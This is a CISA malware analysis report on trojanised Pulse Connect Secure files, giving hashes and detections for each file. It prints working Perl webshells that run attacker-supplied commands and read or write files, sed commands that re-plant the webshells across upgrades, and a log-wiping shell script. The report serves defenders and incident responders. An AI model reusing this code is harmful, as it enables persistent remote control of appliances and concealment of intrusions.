Malware Analysis Report (AR21-202G)

MAR-10335467-1.v1: Pulse Connect Secure

Click to Tweet.
Click to send to Facebook.
Click to Share.

Summary

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA received eight files for analysis. These files are Pulse Secure system applications which have been modified by a malicious cyber actor. The primary purpose of these system modifications is to provide a remote operator command and control (C2) access over a compromised device running the modified Pulse Secure software. This analysis is derived from malicious files found on Pulse Connect Secure devices.

For a downloadable copy of IOCs, see: MAR-10335467-1.v1.WHITE.stix.

Submitted Files (8)

1e862c3be851c984843f8b36e14decc1b25aed75e1bee4fd184ca70c4aaa7d56 (clear_log.sh)

463023f0969b2b52bc491d8787de876e59f0d48446f908d16d1ce763bbe05ee9 (DSUpgrade.pm)

6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767 (DSUpgrade.pm)

829b3a9e91ed8c2a0a9d77ea9c4d8adeb0b815e03502d7b5d643400d3b0828bf (healthcheck.cgi)

859bfee6ebbc8823e998fe7140303292c2925f57a11368d1be5b393b1015f136 (compcheckjava.cgi)

c366c9d41c2bff9fce8a74e2a323f2e104149cf993413dddd8514bb69b054d69 (DSUpgrade.pm)

db389b866913e5af287eb3288cc1f5e8a114484bb9309cc05afbea8943d0887c (meeting_testjs.cgi)

e1efbc8b6ed320bc5762ebd6d59b8ba4c5792c4a6e7f3a605c8c7cb61fadd9a2 (licenseserverproto.cgi)

Findings

463023f0969b2b52bc491d8787de876e59f0d48446f908d16d1ce763bbe05ee9

Tags

trojanwebshell

Details
Name DSUpgrade.pm
Size 5361 bytes
Type Perl5 module source, ASCII text, with very long lines
MD5 6644c8001e89069128a6def1772ab104
SHA1 bca88545f0e413112e1463d9944a9c217e8ddf83
SHA256 463023f0969b2b52bc491d8787de876e59f0d48446f908d16d1ce763bbe05ee9
SHA512 46273c43a98e3b4a7c7d7daefdb0059b0cd72fa449c86238b80fced095236d33be8e522ccc9c32b3d1fe1855910ff1a43a2b2f583c3547a9e563380d9c47d62b
ssdeep 96:FYIFAu1JZtGm4OcAHgDfX2SAF1D2smrsvWlgzP5Ft8gb16rJ2yXp6uIvWZlGMQbl:eIB1XcTfX2hgsmrs+gF3Ar8yXp6uIyUj
Entropy 5.038950
Antivirus
ClamAV Unix.Trojan.ATRIUM-9855919-0
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

The file contains malicious code that was patched into the Pulse Secure application.

--Begin Legitimate Code--
sub extractPackage {
my ($path, $console, $html) = @_;
return "No content read from package file" if (-z $path);

$ENV{"DSINSTALL_PACKAGE"} = $path;

print $html "<li style=\"margin:6px;\">Step 1: Verifying package integrity ...";
print $console "Verifying package integrity ...";

local *FH;
my $prog = "/pkg/packdecrypt";
popen(*FH, "$prog $path /tmp/new-pack.tgz");

my $buffer;
my ($rin, $rout, $rerr) = ('','', '');
vec($rin, fileno(*FH), 1) = 1;
my $ts = time;
while (1) {
    my ($nfound, $timeleft) = select($rout=$rin, undef, undef, 1);
    if ($nfound) {
        my $n = sysread(*FH, $buffer, 64);
        last if !$n;
        print $html $buffer;
    }
    else {
        print $html '.';
        print $console ".";
    }
}
close(*FH);
--End Legitimate Code--

--Begin Malicious Code--
my $cgi_p="/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi";
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");
system("cp -f /tmp/installer/do-install /pkg/");
#system("cp -f /tmp/installer/VERSION /pkg/");
system("cp -f /tmp/installer/sysboot-shlib /pkg/");
system("cp -f /tmp/installer/losetup /pkg/");
print $html system("$cmd_x");
#print $html system("sed -i '/echo_console \"Saving package\"/i$cmd_x' /pkg/do-install");
system("rm -rf /tmp/installer");
my $td = time - $ts;
my $status = $? % 255;
if ($status == 0) {
   print $html " complete ($td seconds)</li>";
   print $console " complete\r\n";
}
else {
   print $html " failed</li>";
   print $console " failed\r\n";
}


return $status == 0;
}
--End Malicious Code--

The patched in code will leverage the following SED command to patch a malicious webshell into the Pulse Secure system file /pkg/do-install:

--Begin Malicious SED Command--
"sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
--End Malicious SED Command--

The purpose of the webshell is to accept a parameter named "id" from within an incoming web application post. The webshell will then process the data provided within the "id" parameter as an operating system command by executing it locally utilizing the system() function.

db389b866913e5af287eb3288cc1f5e8a114484bb9309cc05afbea8943d0887c

Tags

webshell

Details
Name meeting_testjs.cgi
Size 3003 bytes
Type Perl script text executable
MD5 07eb01481c6b72800c0a0eed17a2b3bd
SHA1 9df4c1e279e9f9cdd2e5b4fe919490256cfb7adf
SHA256 db389b866913e5af287eb3288cc1f5e8a114484bb9309cc05afbea8943d0887c
SHA512 8d1763fe185d97b0a7393347cedd6a6b896cf7563e486fab318bb2a88a68e12972c54a4740983f779cad46a78b3ffd1050c1302fdbcbd38dc724be06e734d4c0
ssdeep 48:E1LYmef1MmZ1rk5s+y93VuIxsv9vheLvxkbYu6O9GnMr3mNdLAZkV3R8ewRRVfZQ:EJYb5ZBkO+ypVVxsv9vheLvxkV6O9Gnh
Entropy 5.520210
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure Common Gateway Interface (CGI) application with the following malicious code patched in. This code is designed to perform an initial check to determine whether data was passed into the web application within a parameter named "id". If this parameter is provided, the code will extract its contents and execute them on the target system using the sytem() function. If no "id" parameter is passed to the application, the code will simply execute the main() function of the original Pulse Secure application.

--Begin Patched In Malicious Code--
if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}
--End Patched In Malicious Code--

6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767

Tags

webshell

Details
Name DSUpgrade.pm
Size 9791 bytes
Type Perl5 module source, ASCII text
MD5 4d5b410e1756072a701dfd3722951907
SHA1 cc68a9c5ff57129e8b897d228e54807841f8ff67
SHA256 6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767
SHA512 965b13b1a11c2b2472de1f491bb3fde1d96288fa204428b135281ae7928a5bafea5c244fdd1f47a96242861c94a4fa8d5f6664f543dec33cfc519faca044766d
ssdeep 192:eIB1XcTfXss+nBqXb+TSWbgXCiwWjoBTWFI4MhiirXHLwQBNaBiF3Ar8yXpayUM6:eIB1X1phiJ/irZNaBiF3CjCswmPyVoM
Entropy 5.235000
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure Perl application that has been modified to add webshell script code into the content of the Pulse Secure Perl CGI script file "/root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi."

The script contains the following patched in commented out code:

—Begin Patched In Commented CGI Code—
###scriptstart
#/bin/mount -o remount,rw /dev/root /
#/bin/tar -xzf $innerarchive ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/tar -xzf $innerarchive ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/\#\#start_total/,/\#\#end_total/w 7CxA1p' outer-do-install
#/bin/sed -i '/DSINSTALL_CLEAN/r 7CxA1p' ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w GqTv3w' outer-do-install
#/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w Vi6d8h4' outer-do-install
#/bin/sed -i '/^use DSUtilTable/r GqTv3w' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/^sub main/r Vi6d8h4' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/\#\#perlstart/,/\#\#perlend/s/#//' ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/\#\#scriptstart/,/\#\#scriptend/s/^/#/' ./root/home/perl/DSUpgrade.pm
#/usr/bin/gzip -d $innerarchive
#/bin/tar -f /tmp/inside-package.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/tar -f /tmp/inside-package.tar -u ./root/home/perl/DSUpgrade.pm
#/bin/rm -f 7CxA1p
#/bin/rm -f GqTv3w
#/bin/rm -f Vi6d8h4
#/bin/rm -fr root
#/usr/bin/gzip -c /tmp/inside-package.tar > $innerarchive
###scriptend

###cgistart1
#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib";
#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib/MIME/Base64";
#use Crypt::RC4;
#use MIME::Base64 ();
#
#sub parse_parameters ($) {
# my %ret;
#
# my $input = shift;
#
# foreach my $pair (split('&', $input)) {
#    my ($var, $value) = split('=', $pair, 2);
#    
#    if($var) {
#     $value =~ s/\+/ /g ;
#     $value =~ s/%(..)/pack('c',hex($1))/eg;
#
#     $ret{$var} = $value;
#    }
# }
#
# return %ret;
#}
###cgiend1

###cgistart2
#    my $enckey='1234567';
#    my $data='1234567812345678';
#        my $cipher = RC4($enckey, $data);    
#        my $encode = MIME::Base64::encode($cipher);
#    my $psalLaunch = CGI::param("serverid");
#    if ($psalLaunch =~ /csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa/)
#    {
#    my ($cmd, %FORM);
#
#    $|=1;
#
#    print "Content-Type: text/html\r\n";
#    print "\r\n";
#    %FORM = parse_parameters($ENV{'QUERY_STRING'});
#
#    if(defined $FORM{'cmd'}) {
#     $cmd = $FORM{'cmd'};
#    }
#
#print '<HTML>
#<body>
#<form action="" method="GET">
#<input type="text" name="cmd" size=45 value="' . $cmd . '">
#<input type="text" name="serverid" size=45 value="csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa">
#<input type="submit" value="Run">
#</form>
#<pre>';
#
#if(defined $FORM{'cmd'}) {
# print "Results of '$cmd' execution:\n\n";
# print "-"x80;
# print "\n";
#
# print $encode;
# system $cmd;
# print "-"x80;
# print "\n";
#}
# print "</pre>";
# exit(0);
#    }
###cgiend2

##end_total
--End Patched In Commented CGI Code--

The Pulse Secure Perl script also contains the following suspicious live/uncommentedcode. This code is designed to modify several Pulse Secure system files using the SED command as well as attempt to install code from within an archive named new-pack.tgz expected to be currently stored on the target system.

--Begin Patched In Live/Uncommented Code--
sub installPackage {
my ($clean, $console, $html) = @_;

$ENV{"DSINSTALL_CLEAN"} = $clean;

##start_total
##perlstart
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar -xzf /tmp/new-pack.tgz ./installer/outer-do-install");
my $statushh = $? % 255;
if( $statushh != 0 )
{
       system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/perl/DSUpgrade.pm");    
       system("/bin/sed -i '/\#\#start_total/,/\#\#end_total/w K872Bu' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/DSINSTALL_CLEAN/r K872Bu' ./root/home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w Mj1Za' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w 1uMfVB' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/^use DSUtilTable/r Mj1Za' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/^sub main/r 1uMfVB' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/usr/bin/gzip -d /tmp/new-pack.tgz");
       system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/perl/DSUpgrade.pm");
       system("/bin/rm -f K872Bu");
       system("/bin/rm -f Mj1Za");
       system("/bin/rm -f 1uMfVB");    
       system("/bin/rm -fr root");
       system("rm -f /tmp/new-pack.tgz");
       system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");                                        
}
else{
system("/bin/sed -i '/\#\#start_total/,/\#\#end_total/w Nc3Gy.pm' /home/perl/DSUpgrade.pm");
system("/bin/sed -i '/packdecrypt/r Nc3Gy.pm' ./installer/outer-do-install");
system("/bin/sed -i '/\#\#perlstart/,/\#\#perlend/s/^/#/' ./installer/outer-do-install");
system("/bin/sed -i '/\#\#scriptstart/,/\#\#scriptend/s/#//' ./installer/outer-do-install");
system("/usr/bin/gzip -d /tmp/new-pack.tgz");
system("/bin/tar -f /tmp/new-pack.tar -u ./installer/outer-do-install");
system("rm -f Nc3Gy.pm");
system("rm -f /tmp/new-pack.tgz");
system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");
system("rm -fr installer");
}
--End Patched In Live/Uncommented Code--

Analysis indicates this live/uncommented code is designed to present a web form to a remote operator, wherein the remote operator can enter commands that will be run locally on the target system. The live/uncommented code also has the capability to modify several Pulse Secure system files utilizing the SED command.

829b3a9e91ed8c2a0a9d77ea9c4d8adeb0b815e03502d7b5d643400d3b0828bf

Tags

webshell

Details
Name healthcheck.cgi
Size 9275 bytes
Type Perl script text executable
MD5 dee973c4ba232541b689b67ab41aa925
SHA1 7b0bc1c2442d672ffbd1cc0a9e67dbeae4d72f52
SHA256 829b3a9e91ed8c2a0a9d77ea9c4d8adeb0b815e03502d7b5d643400d3b0828bf
SHA512 08f5c21c303a38a671c17e6731ef45aa39f581db632d8f2c0c674fe44927d05152691ff31b38d874fffb87b5fa02e4c82efe0a962cc4fd1cb28ba61d0f648955
ssdeep 192:XzwJNuIYj7rcCOk1QrhMeWyOUV9AWojcZiOQiQsfinnoK9Cih1pa+7yiEhm:XzwJwrXWOUV9AWojoiOugQ
Entropy 5.120132
Antivirus
Symantec Hacktool.Webshell
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI script that contains malicious code that was patched into the file. The modification modifies the file to become a webshell. The following code includes comments that provides information on the capabilities of this patched webshell:

--Begin Malicious Code--
if ($ENV
{
'REQUEST_METHOD'
}                                            //CISA COMMENT: $ph variable contains RC4 crypto key
eq "POST") $ph="[REDACTED]";
sub r             //CISA COMMENT: Generate random block of data
{
my $n=$_[0];
my $rs;
for (my $i=0;$i<$n;$i++)
{
    my $n1=int(rand(256));
    $rs.=chr($n1);
}
return $rs;
}
sub a             //CISA COMMENT: RC4 / BASE64 decryption function
{
my $st=$_[0];
my $k=r(6);
my $en = RC4( $k.$ph, $st);
return encode_base64($k.$en);
}
sub b         //CISA COMMENT: RC4 / BASE64 decryption function
{
my $s= decode_base64($_[0]);
my $l=length($s);
my $k= substr($s,0,6);
my $en=substr($s,6,$l-6);
my $de = RC4( $k.$ph, $en );
return $de;
}
sub c                     //CISA COMMENT: Download File from target system
{
my $fi=CGI::param('img');
my $FN=b($fi);
my $fd;
print "Content-type: application/x-download\n";
open(*FILE, "<$FN" );
while(<FILE>)
{
    $fd=$fd.$_;
}
close(*FILE);
print "Content-Disposition: attachment; filename=tmp\n\n";
print a($fd);        //CISA COMMENT: RC4 ENCRYPT and BASE64 encode file before giving it to operator
}
sub d.
{
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $fi = CGI::param('cert');                    //CISA COMMENT: 'cert' contains name of the file to be written.
$fi=b($fi);
my $pa=CGI::param('md5');                 //CISA COMMENT: 'md5' contains the content to be written to file.
$pa=b($pa);
open (*outfile, ">$pa");
print outfile $fi;                                     //CISA COMMENT: The content is written to the file.
close (*outfile);
}
sub e     //CISA COMMENT: Decrypt and execute provided system command
{
print "Cache-Control: no-cache\n";
print "Content-type: image/gif\n\n";
my $na=CGI::param('name');
$na=b($na);    //CISA COMMENT: Base64 decode and RC4 decrypt incoming command
my $rt;
if (!$na or $na eq "cd")
{
    $rt="Error 404";
}
else
{
    my $ot="/tmp/1";
    system("$na >/tmp/1 2>&1");     //CISA COMMENT: Execute decrypted command
    open(*cmd_result,"<$ot");
    while(<cmd_result>)
    {
    $rt=$rt.$_;
    }
    close(*cmd_result);
    unlink $ot
}
print a($rt);
}
sub f
{
if(CGI::param('cert'))
{
    d();
}
elsif(CGI::param('img') and CGI::param('name'))
{
    c(); //CISA COMMENT: Download file from system
}
elsif(CGI::param('name') and CGI::param('img') eq "")
{
    e(); //CISA COMMENT: Decrypt and execute provided system command
}
else
{
    &main();
}
}
if ($ENV
{
'REQUEST_METHOD'
}
eq "POST")
{
f();
}
else
{
&main();
}
--Malicious Code--

The webshell is capable of allowing a remote operator to read and write files on the target system. It is also capable of allowing the remote operator to pass system commands to the target system which will be executed as system commands. The data passed to and from this webshell by the remote operator will be RC4 encrypted with a hard coded RC4 key.

1e862c3be851c984843f8b36e14decc1b25aed75e1bee4fd184ca70c4aaa7d56

Tags

webshell

Details
Name clear_log.sh
Size 713 bytes
Type Bourne-Again shell script, ASCII text executable
MD5 00f8c2497fadd2979c08487181cfc4fd
SHA1 0577f0c4d5c40641448961a7ccf348bcfceec4a5
SHA256 1e862c3be851c984843f8b36e14decc1b25aed75e1bee4fd184ca70c4aaa7d56
SHA512 50733b16b5d9451ea2f48d2f696c3eedf39a465535904c8db34d471f387292a13723164cf22c00e1801e1a387033691d10ca629020cb4bcf88b943a8713b1ac4
ssdeep 12:4+/jndfJGpOL9H6niyG9H6wEDs+/xI8lTDAGs+0zI8lKeZEDS/w4Qcvc:lfE80nic1f/xI8lXAGf0zI8lKeqS/fvc
Entropy 4.934267
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This malicious file contains the script illustrated below:

—Begin Script—
#!/bin/bash

declare -A dic
dic=(
[events]=log.events.vc0
[user_access]=log.access.vc0
[admin_access]=log.admin.vc0
)

if [ $# = 2 ]; then
for log in ${!dic[@]};
do
   if [ $1 = ${log} ]; then
    for I in "8" "9" "a" "b" "c" "d" "e" "f";do
       for J in "0" "1" "2" "3" "4" "5" "6" "7" "8" "9" "a" "b" "c" "d" "e" "f";do
        sed -i "s/.\x00[^\x00]*$2[^\x00]*\x09.\x00//g" /data/runtime/logs/${dic[${log}]}
        sed -i "s/\x$I$J\x00[^\x00]*$2[^\x00]*\x09\x$I$J\x00//g" /data/runtime/logs/${dic[${log}]}
       done
    done
   fi
done
# sed -i "s/.\x00[^\x00]*$1[^\x00]*\x09.\x00//g" log.events.vc0
else
   echo "usage: /home/bin/bash clear_log.sh [logfile] [keyword(regex)]"
fi
—End Script—

This script is designed to allow a malicious operator to modify the following log files on a Pulse Secure system:

—Begin Log Files—
log.events.vc0
log.access.vc0
log.admin.vc0
—End Log Files—

It is presumed the operator will leverage this utility to hide malicious cyber actor activity carried out on target Pulse Secure devices.

859bfee6ebbc8823e998fe7140303292c2925f57a11368d1be5b393b1015f136

Tags

webshell

Details
Name compcheckjava.cgi
Size 1815 bytes
Type Perl script text executable
MD5 5903d2d544533cd43e82527faac6567a
SHA1 13b53fd7fad41cf727764a0c23a031831c5147ea
SHA256 859bfee6ebbc8823e998fe7140303292c2925f57a11368d1be5b393b1015f136
SHA512 480d1f34c1e8d195e0bd3c4c41bf50cd94e87d968c7a2448ccf790750f5dc4a7e88d6799a5812bc418f79fc92ecedd0efb3844a86ca1ab060251cbf69d6e84dd
ssdeep 48:ErLYUsef1MmZ1rkp6u13CDIqc7b6wn1GE+MI0R8eu/nf3we:EfY05ZBkpzhCDdyGXMj4nx
Entropy 5.541530
Antivirus
Symantec Hacktool.Atrium
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI application with the following malicious code patched in:

--Begin Malicious Code--
if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}
--End Malicious Code--

This patched in code is designed to perform an initial check to determine whether data was passed into the web application within a parameter named "id". If this parameter is provided, the code will extract its contents and execute them on the target system using the sytem() function. If no "id" parameter is passed to the application, the code will simply execute the main() function of the original Pulse Secure application.

e1efbc8b6ed320bc5762ebd6d59b8ba4c5792c4a6e7f3a605c8c7cb61fadd9a2

Tags

webshell

Details
Name licenseserverproto.cgi
Size 3517 bytes
Type Perl script text executable
MD5 51751d9ed17047f8dd579e3b8a9e82be
SHA1 df50d0035a86b68d6c382c3364d7e1046fddb8a6
SHA256 e1efbc8b6ed320bc5762ebd6d59b8ba4c5792c4a6e7f3a605c8c7cb61fadd9a2
SHA512 930b581705e4eeef5e812ac1cd48eda90b31761ef5e035539c01e3b178215b5f3fa855f0a0cdaa725d029879f764e410b2b90090a603516e6d8ced217c03fa21
ssdeep 48:ElLYmeAJAZoZpBHMeQT808inRbxUQjQk0BeWo7BuswT4o7oo7vpBBBQWBZ7zSH74:EZYkJAZOpBqpxUxHo0v/wO27YJ
Entropy 5.319437
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI application with the following malicious webshell code patched in:

—Begin Patched Main Function—
##cgiend1
sub main {
##cgistart2
   my $enckey='1234567';
   my $data='1234567812345678';
       my $cipher = RC4($enckey, $data);    
       my $encode = MIME::Base64::encode($cipher);
   my $psalLaunch = CGI::param("serverid");
   if ($psalLaunch =~ /csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa/)
   {
   my ($cmd, %FORM);

   $|=1;

   print "Content-Type: text/html\r\n";
   print "\r\n";
   %FORM = parse_parameters($ENV{'QUERY_STRING'});

   if(defined $FORM{'cmd'}) {
    $cmd = $FORM{'cmd'};
   }

print '<HTML>
<body>
<form action="" method="GET">
<input type="text" name="cmd" size=45 value="' . $cmd . '">
<input type="text" name="serverid" size=45 value="csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa">
<input type="submit" value="Run">
</form>
<pre>';

if(defined $FORM{'cmd'}) {
print "Results of '$cmd' execution:\n\n";
print "-"x80;
print "\n";

print $encode;
system $cmd;
print "-"x80;
print "\n";
}
print "</pre>";
exit(0);
   }
—End Patched Main Function—

This malicious code is a replacement to the legitimate main function. This modified main function will check to see if a parameter named “serverid” is provided to the web application. If it is, it will parse out the parameter data and execute it on the target system using the system() function. This code effectively modified the functionality of this legitimate Pulse Secure web application to allow a remote operator to execute system commands on a compromised system.

c366c9d41c2bff9fce8a74e2a323f2e104149cf993413dddd8514bb69b054d69

Tags

trojanwebshell

Details
Name DSUpgrade.pm
Size 5260 bytes
Type Perl5 module source, ASCII text, with very long lines
MD5 8b89bd0395c3db9a85b340e5bd8775fc
SHA1 2c8843427ee85b2212ce7ee1c9d3a5e254154aca
SHA256 c366c9d41c2bff9fce8a74e2a323f2e104149cf993413dddd8514bb69b054d69
SHA512 a17675d93c894961cc18b1f01a4ce526936fd246fed5150f425759e4889a4150c23a13468deeb95440f9d846998f9adfba553c4112d6fb8057b773e57e1893be
ssdeep 96:FYIFAu1JZtGm4OcAHgDfX2HAF1K2dsvWlgzP5Ft8gb16rJ2yXp6uIvWZlGMQbvek:eIB1XcTfX2QDds+gF3Ar8yXp6uIyUMQB
Entropy 5.033089
Antivirus
ClamAV Unix.Trojan.ATRIUM-9855919-0
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure Perl application with the following malicious code patched in:

—Begin Malicious Patched In Code—
sub extractPackage {
my ($path, $console, $html) = @_;
return "No content read from package file" if (-z $path);

$ENV{"DSINSTALL_PACKAGE"} = $path;

print $html "<li style=\"margin:6px;\">Step 1: Verifying package integrity ...";
print $console "Verifying package integrity ...";

local *FH;
my $prog = "/pkg/packdecrypt";
popen(*FH, "$prog $path /tmp/new-pack.tgz");

my $buffer;
my ($rin, $rout, $rerr) = ('','', '');
vec($rin, fileno(*FH), 1) = 1;
my $ts = time;
while (1) {
    my ($nfound, $timeleft) = select($rout=$rin, undef, undef, 1);
    if ($nfound) {
        my $n = sysread(*FH, $buffer, 64);
        last if !$n;
        print $html $buffer;
    }
    else {
        print $html '.';
        print $console ".";
    }
}
close(*FH);
my $cgi_p="/home/webserver/htdocs/dana-na/meeting/meeting_testjs.cgi";
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");
system("cp -f /tmp/installer/do-install /pkg/");
system("cp -f /tmp/installer/VERSION /pkg/");
system("cp -f /tmp/installer/sysboot-shlib /pkg/");
system("cp -f /tmp/installer/losetup /pkg/");
system("$cmd_x");
system("rm -rf /tmp/installer");
my $td = time - $ts;
my $status = $? % 255;
if ($status == 0) {
   print $html " complete ($td seconds)</li>";
   print $console " complete\r\n";
}
else {
   print $html " failed</li>";
   print $console " failed\r\n";
}


return $status == 0;
}
—End Malicious Patched In Code—

The patched in code will leverage the following SED command to patch a malicious webshell into the Pulse Secure system file /pkg/do-install:

--Begin Malicious SED Command--
"sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
--End Malicious SED Command--

The purpose of the webshell is to accept a parameter named "id" from within an incoming web application post. The webshell will then process the data provided within the "id" parameter as an operating system command by executing it locally utilizing the system() function.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

